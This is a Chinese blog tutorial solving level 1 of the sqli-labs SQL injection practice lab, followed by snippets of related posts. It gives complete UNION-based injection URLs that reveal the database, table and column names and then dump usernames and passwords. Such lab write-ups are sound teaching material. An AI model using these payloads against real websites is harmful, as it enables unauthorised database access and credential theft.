sqli-labs-master第一关sql注入

最新推荐文章于 2024-08-05 16:49:43 发布
最新推荐文章于 2024-08-05 16:49:43 发布
阅读量1.2k 收藏 4
点赞数 3
分类专栏: drops 文章标签: sql注入 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43480081/article/details/97290784
版权

文章参考了博客:https://blog.csdn.net/weixin_44932880/article/details/96589694
先了解一下数据库
先登录账户,输入密码
在这里插入图片描述
之后可以看到N个数据库
在这里插入图片描述
打开数据库可以看到N个表
在这里插入图片描述
每个表里还有N个字段
在这里插入图片描述除了用sql语句查看,当然也可以用MySQL等直接查看

开始步入正题

sql注入
url处先尝试着输入?id=1;
在这里插入图片描述再尝试?id=2;
在这里插入图片描述当尝试闭合url输入时
?id=1’
在这里插入图片描述报出如上错误,根据错误提示信息
the right syntax to use near ‘‘1’’ LIMIT 0,1’ at line 1
猜测后端可能是:where id‘用户输入’LIMIT 0,1
当用户直接输入*** ’时,造成了闭合
这时就需要url的注释符#(%23)来注释,有时#不能用,就要用到#的url编码%23
在与注释符#之间就可以进行sql注入,爆出我们想要的内容

又是硬核的知识:联合查询union
union后获取的内容条数与前面查询的列数必须相同
本题下一步就是获得回显个数
利用order by函数,及二分法快速测得列数为3
测列数硬核联合查询union来了
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2,database();%23

id=0则返回空,后面就返回select 1,2,database()的内容,即为1,2,security

security即为database()的返回就是指当前数据库的名字

可题目只显示了2,security 可知只有2与3两个回显位能看到
在这里插入图片描述

已经知道了当前的数据库名,接下来就是要爆出表名

接下来我们就可以利用information_Schema.tables获取security里的表格信息

127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1 ,2,group_concat(table_name) from information_Schema.tables where table_schema=‘security’;%23

这个group_concat()函数使表名按一行输出输出

接下来当然是字段了
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2 ,group_concat(column_name) from information_schema.columns %23
在这里插入图片描述这时细心一下的话,其实可以发现,这样会查出所有的字段,这样就会有很多无用的信息
可以用:
where%20table_name=%27users%27and%20table_schema%20=‘security’;
这样来达到精准的查询
完整的url为:
http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ union select 1,2 ,group_concat(column_name) from information_schema.columns

where%20table_name=%27users%27and%20table_schema%20=‘security’;%23
在这里插入图片描述这是我们有了 用户名和密码的字段

是时候爆出我们想要的数据了:

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username) ,group_concat(password) from users ;%23

在这里插入图片描述
至此任务完成

再次感谢这位同学的帮助

你的小粉丝
关注
专栏目录
sqli-labs第一关sql注入流程
qq_33598708的博客
03-28 1684
正常访问 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='2 错误 由' and '1'='1可知道是字符型,如果是数字型的这种会提示错误。 开始注入: http://127.0.0.
SQL注入之手工注入sqli-labs-master
龙乐的专栏
08-22 3929
sql注入就是用户在Web页面输入的指令内容可以在数据库执行。这里我通过sqli-labs-master来演示下手工sql注入。 首先是搭建环境,我用的是WampServer
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
sqli-labs-master第一关
weixin_44932880的博客
07-20 1971
本篇是我做完第一题后的一些理解 首先将我了解的数据库的一些内容说一下 一个账户可以有多个数据库,每个数据库里可以建多个表,表里用字段来储存信息。 如图,localhost为本地账户,security等是数据库,security下面的emails等为表格, 而右边的id,email_id则为字段,字段下面就是储存的信息。 ...
Sqliabs注入过程
最新发布
weixin_71398630的博客
08-05 592
提示请输入你的id:首先sql注入输入的数据都是合理的查询语句。产生原因是由于没有对用户的输入做过滤,导致意外的查询语句进入到了程序,查询到了本不应该查询到的数据。尝试闭合,加上后可以发现报错,说明闭合成功,再加入注释符号,使后面的程序不生效,mysql的注释符号有三种:--空格/***/;使用--+ 的原因是,在url,会被解析为空格,而直接加空格会被忽略;接下来就可以构造查询语句:首先查询表的列数:使用order by。
SQLi-Labs SQL注入练习平台(第一关)
banyang6297的博客
01-18 357
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科   我用的是看...
sqli-labs-master第一关:基于错误的GET单引号字符型注入
m_ing
05-07 445
前言:这几天时间就和大家一起研究sqli-labs-master,一起闯关。至于sqli-labs-master的环境搭建我这里就不演示了,可以参考https://blog.csdn.net/Litbai_zhang 的博客自行搭建。 首先来到第一关 http://192.168.89.131/sqli-labs-master/Less-1/ 都知道第一关是基于错误的get型注入 先来了解什么...
sql注入第一关
computet_的博客
01-29 1308
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践,这将提高...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
sqli-labs(php7.3以上可运行)
01-29
总结来说,"sqli-labs"是一个宝贵的资源,对于想要深入了解SQL注入及其防护的人来说,它提供了一个理想的实践平台。在PHP7.3及以上版本的环境,你可以更安全地探索这个主题,提高自己的安全技能,并为未来的项目...
SQL注入第一关
qq_73940312的博客
01-28 743
由之前的查询结果猜测users表大概率存有管理员账户及密码,所以使用id=-1' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema=database() -- + 可以查询到users表内的列名。再使用id=-1' union select 1,2,3 -- + 得知输出的数据对应的是第2和第3列。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2048
SQL注入闯关
sql字符型注入-sqli第1关
weixin_46784800的博客
11-04 417
sql注入知识 dvwa 1' order by 1# 1' order by 2# 1' order by 3# 排序 1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口! 1' union select database(),user()# 联合查询 database() 查询数据库名字 user() 返回当前查询的用户名 1' union select version(),@@version_compile_os# ver
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
SQL注入实验——web靶机第一关
qq_41554179的博客
03-09 2987
测试交互方法(此靶机为get); 判断字符类型;(此靶机没报错,为字符型) 构造闭合(次靶机闭合为 ‘ ); 爆库名; http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+ 爆表名; http://192.168.96.133/sqli-labs-master/L...
SQL注入sqli第一关详细讲解
m0_50818626的博客
05-23 1277
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库的所有表名,我们需要查询password和username,常理下这些数据都会存储到users,所以我们现在查询users这个表的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值